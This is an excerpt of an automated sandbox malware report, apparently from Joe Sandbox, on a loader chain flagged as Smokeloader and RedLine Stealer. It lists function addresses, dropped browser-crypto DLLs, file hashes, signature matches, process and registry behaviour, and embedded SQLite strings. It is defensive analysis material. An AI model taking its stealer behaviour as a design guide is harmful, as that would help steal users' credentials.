Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF6831179D0	9_2_00007FF6831179D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041BD50	10_2_0041BD50
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041A130	10_2_0041A130
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00419B58	10_2_00419B58
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00419B30	10_2_00419B30
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2635A0	10_2_6C2635A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D542B	10_2_6C2D542B
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2DAC00	10_2_6C2DAC00
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A5C10	10_2_6C2A5C10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2B2C10	10_2_6C2B2C10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C275440	10_2_6C275440
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D545C	10_2_6C2D545C
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2C34A0	10_2_6C2C34A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2CC4A0	10_2_6C2CC4A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C276C80	10_2_6C276C80
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26D4E0	10_2_6C26D4E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A6CF0	10_2_6C2A6CF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2764C0	10_2_6C2764C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C28D4D0	10_2_6C28D4D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C27FD00	10_2_6C27FD00
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C28ED10	10_2_6C28ED10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C290512	10_2_6C290512
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2C85F0	10_2_6C2C85F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A0DD0	10_2_6C2A0DD0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2C9E30	10_2_6C2C9E30
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2B5600	10_2_6C2B5600
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A7E10	10_2_6C2A7E10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D6E63	10_2_6C2D6E63
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26C670	10_2_6C26C670
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2B2E4E	10_2_6C2B2E4E
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C284640	10_2_6C284640
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C289E50	10_2_6C289E50
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A3E50	10_2_6C2A3E50
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2C4EA0	10_2_6C2C4EA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2CE680	10_2_6C2CE680
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C285E90	10_2_6C285E90
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D76E3	10_2_6C2D76E3
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26BEF0	10_2_6C26BEF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C27FEF0	10_2_6C27FEF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C279F00	10_2_6C279F00
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A7710	10_2_6C2A7710
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2B77A0	10_2_6C2B77A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26DFE0	10_2_6C26DFE0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C296FF0	10_2_6C296FF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2AB820	10_2_6C2AB820
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2B4820	10_2_6C2B4820
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C277810	10_2_6C277810
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2AF070	10_2_6C2AF070
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C288850	10_2_6C288850
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C28D850	10_2_6C28D850
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2960A0	10_2_6C2960A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C28C0E0	10_2_6C28C0E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A58E0	10_2_6C2A58E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D50C7	10_2_6C2D50C7
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C27D960	10_2_6C27D960
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2BB970	10_2_6C2BB970
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2DB170	10_2_6C2DB170
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C28A940	10_2_6C28A940
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26C9A0	10_2_6C26C9A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C29D9B0	10_2_6C29D9B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A5190	10_2_6C2A5190
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2C2990	10_2_6C2C2990
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A9A60	10_2_6C2A9A60
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2622A0	10_2_6C2622A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C294AA0	10_2_6C294AA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C27CAB0	10_2_6C27CAB0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D2AB0	10_2_6C2D2AB0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2DBA90	10_2_6C2DBA90
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C281AF0	10_2_6C281AF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2AE2F0	10_2_6C2AE2F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2A8AC0	10_2_6C2A8AC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2AD320	10_2_6C2AD320
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C27C370	10_2_6C27C370
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C265340	10_2_6C265340
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26F380	10_2_6C26F380
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2D53C8	10_2_6C2D53C8
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3EAC30	10_2_6C3EAC30
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3D6C00	10_2_6C3D6C00
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C31AC60	10_2_6C31AC60
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C36ECD0	10_2_6C36ECD0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C30ECC0	10_2_6C30ECC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C43AD50	10_2_6C43AD50
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3DED70	10_2_6C3DED70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C498D20	10_2_6C498D20
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C314DB0	10_2_6C314DB0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C49CDC0	10_2_6C49CDC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3A6D90	10_2_6C3A6D90
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3F0E20	10_2_6C3F0E20
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3AEE70	10_2_6C3AEE70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C396E90	10_2_6C396E90
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C31AEC0	10_2_6C31AEC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3B0EC0	10_2_6C3B0EC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C316F10	10_2_6C316F10
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3D2F70	10_2_6C3D2F70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C450F20	10_2_6C450F20
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C37EF40	10_2_6C37EF40
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C31EFB0	10_2_6C31EFB0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3EEFF0	10_2_6C3EEFF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C310FE0	10_2_6C310FE0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C458FB0	10_2_6C458FB0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C360820	10_2_6C360820
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C39A820	10_2_6C39A820
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3E4840	10_2_6C3E4840
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C4168E0	10_2_6C4168E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C366900	10_2_6C366900
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C348960	10_2_6C348960
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3D09B0	10_2_6C3D09B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3A09A0	10_2_6C3A09A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3CA9A0	10_2_6C3CA9A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C42C9E0	10_2_6C42C9E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3449F0	10_2_6C3449F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3C8A30	10_2_6C3C8A30
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3BEA00	10_2_6C3BEA00
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C38CA70	10_2_6C38CA70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C38EA80	10_2_6C38EA80
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3B0BA0	10_2_6C3B0BA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C416BE0	10_2_6C416BE0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C39A430	10_2_6C39A430
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C374420	10_2_6C374420
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C328460	10_2_6C328460
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C43A480	10_2_6C43A480
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3564D0	10_2_6C3564D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3AA4D0	10_2_6C3AA4D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C414540	10_2_6C414540
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C458550	10_2_6C458550
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3B0570	10_2_6C3B0570
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C372560	10_2_6C372560
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C368540	10_2_6C368540
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3045B0	10_2_6C3045B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C39E5F0	10_2_6C39E5F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3DA5E0	10_2_6C3DA5E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C36C650	10_2_6C36C650

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: String function: 6C29CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: String function: 6C2A94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: String function: 6C339B10 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: String function: 6C333620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: String function: 00402000 appears 287 times

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3000

Source: server[1].exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: server.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: 7847438767[1].exe.10.dr	Static PE information: Number of sections : 11 > 10
Source: CFHIIJDBKE.exe.10.dr	Static PE information: Number of sections : 11 > 10

Source: IRqsWvBBMc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.3355199740.00000000024FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: IRqsWvBBMc.exe	Static PE information: Section: ZLIB complexity 0.9970410422343324
Source: IRqsWvBBMc.exe	Static PE information: Section: erhqbccx ZLIB complexity 0.9946336357132375
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9970410422343324
Source: axplong.exe.0.dr	Static PE information: Section: erhqbccx ZLIB complexity 0.9946336357132375

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/30@5/7

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_6C2C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

10_2_6C2C7030

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

10_2_00411400

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

10_2_00410900

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\server[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
